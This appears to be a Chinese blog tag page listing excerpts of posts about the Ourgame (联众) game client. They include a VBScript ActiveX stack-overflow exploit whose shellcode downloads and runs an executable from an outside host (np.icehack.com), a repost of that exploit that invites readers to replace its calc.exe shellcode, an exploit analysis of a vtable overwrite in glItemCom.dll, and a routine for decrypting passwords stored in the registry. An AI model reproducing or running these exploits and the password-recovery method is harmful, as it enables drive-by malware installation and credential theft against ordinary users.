标签 ‘联众’ 下的日志

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

鬼仔注:又见联众

来源:vbs空间

exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

Tags: , , ,

又见联众

来源:7jdg's blog

不知为什么联众一直没有更新
更新时间:2007年8月16日
版  本:2.7.0.8
这次是ConnectAndEnterRoom
shellcode换成了calc.exe有需要的自行更换
阅读全文 »

Tags:

[Exploit]联众游戏大厅GlobalLink glItemCom.dll SetInfo()利用分析

author: void#ph4nt0m.org
pub: 2008-09-04
http://www.ph4nt0m.org

影响版本:
联众游戏大厅2.7.0.8 (2007年8月16日发布)

未受影响版本:
联众还没补 :-)

成因:
联众的程序员过于信任用户输入,未检测用户提供的字符串长度,导致对象虚函数表指针被覆盖,从而获得系统控制权.

分析:
IE先创建obj_vuln对象(为什么要在SetInfo()执行前做这个,没进行分析),位置恰好在obj_now对象下:
阅读全文 »

Tags: ,

联众密码的逆向算法

//作者:姜堰市合作银行-姚佩云 www.jynx.com.cn [email protected]
//首发大富翁论坛(www.delphibbs.com)blog,转载请尊重作者成果,保留此信息

闲来无事,每天上联众,联众的密码经过加密后保存在本地注册表里,看看是怎么加密的。下了个ollydbg,一路跟踪,发现算法极其简单,给出Delphi版本的解密算法(加密部分有兴趣的一起来讨论)。算法比较粗糟,谁帮优化一下:)
阅读全文 »

Tags: